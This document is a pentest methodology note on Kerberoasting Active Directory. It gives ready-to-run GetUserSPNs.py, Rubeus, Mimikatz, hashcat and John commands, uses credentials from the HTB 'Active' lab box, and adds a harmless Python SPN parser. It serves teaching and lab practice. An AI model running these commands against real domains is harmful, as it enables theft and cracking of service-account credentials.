ActiveDirectoryMethodology.md
A.D. Methodology

  1. Enumerate accounts that have an SPN set (GetUserSPNs.ps1 on Windows, or Impacket's GetUserSPNs.py from any host). With -request, GetUserSPNs.py also asks the DC for a TGS for each SPN and prints it in a crackable format (add -outputfile to write it to disk). The example below uses the credentials of the HTB "Active" box:

    python3 GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100

  2. Get Service Tickets from a domain-joined Windows host. Rubeus requests a TGS for every user account with an SPN and, with /simple, writes one hash per line in a format hashcat and John accept directly:

    PS> .\Rubeus.exe kerberoast /simple /outfile:hashes.txt

  3. Extract Tickets already cached in the current logon session as .kirbi files. Mimikatz only exports what is in the cache, so request a ticket for the target SPN first; the exported .kirbi must then be converted (e.g. with kirbi2john.py, shipped with John the Ripper) before it can be cracked:

    Mimikatz kerberos::list /export

  4. Crack Tickets offline. Mode 13100 / format krb5tgs covers RC4-HMAC tickets (etype 23); tickets encrypted with AES (etype 17/18) need hashcat modes 19600/19700 and crack far more slowly, because the key is derived with salted PBKDF2 instead of a bare NT hash:

    HashCat: hashcat -m 13100 --force <TGSs_file> <passwords_file>

    JohnTheRipper: john --format=krb5tgs --wordlist=<passwords_file> <ticket_file>

Resources

HackTricks

Forge Service Tickets (TGS) with Kerberoasting (MITRE ATT&CK ID: T1558.003, Steal or Forge Kerberos Tickets: Kerberoasting)

Kerberoasting 101

GhostPack tools

Service Principal Names (SPNs)

An SPN consists of three main parts: the service class (the service type, e.g. MSSQLSvc for SQL Server, HTTP for web, exchangeMDB for Exchange, CIFS for file shares), the host the service runs on, written as an FQDN (fully qualified domain name), and the port number. The port is optional, as is a fourth service-name component that some SPNs carry after the host. For example, a Microsoft SQL service running on the dcorp-mgmt host on port 1443 is registered as MSSQLSvc/<FQDN of dcorp-mgmt>:1443.
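A small parser for that format, added here as an example (not code from this repository), is useful when triaging GetUserSPNs output, because the suffix after the colon is not always a port: SQL Server named instances register MSSQLSvc/host:INSTANCENAME, and some SPNs carry a third, service-name component. The SPN strings in the sample are constructed, not taken from any real domain.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class SPN:
    service_class: str          # e.g. MSSQLSvc, HTTP, CIFS
    host: str                   # FQDN (or short name, if registered that way)
    port: Optional[int]         # numeric suffix after ':', if any
    instance: Optional[str]     # non-numeric suffix after ':' (e.g. a named SQL instance)
    service_name: Optional[str] # optional third component


def parse_spn(spn: str) -> SPN:
    """Split 'class/host[:port-or-instance][/service-name]' into its parts."""
    parts = spn.split("/")
    if len(parts) not in (2, 3) or not parts[0] or not parts[1]:
        raise ValueError(f"malformed SPN: {spn!r}")
    service_class, hostpart = parts[0], parts[1]
    service_name = parts[2] if len(parts) == 3 else None
    host, _, suffix = hostpart.partition(":")
    if not host:
        raise ValueError(f"malformed SPN (empty host): {spn!r}")
    port = int(suffix) if suffix.isdigit() else None
    instance = suffix if suffix and not suffix.isdigit() else None
    return SPN(service_class, host, port, instance, service_name)


if __name__ == "__main__":
    # Constructed sample SPNs (assumption), one per shape the parser handles.
    for s in ("MSSQLSvc/sql01.corp.example:1433",
              "MSSQLSvc/sql01.corp.example:SQLEXPRESS",
              "HTTP/web01.corp.example",
              "ldap/dc01.corp.example/corp.example"):
        print(parse_spn(s))
```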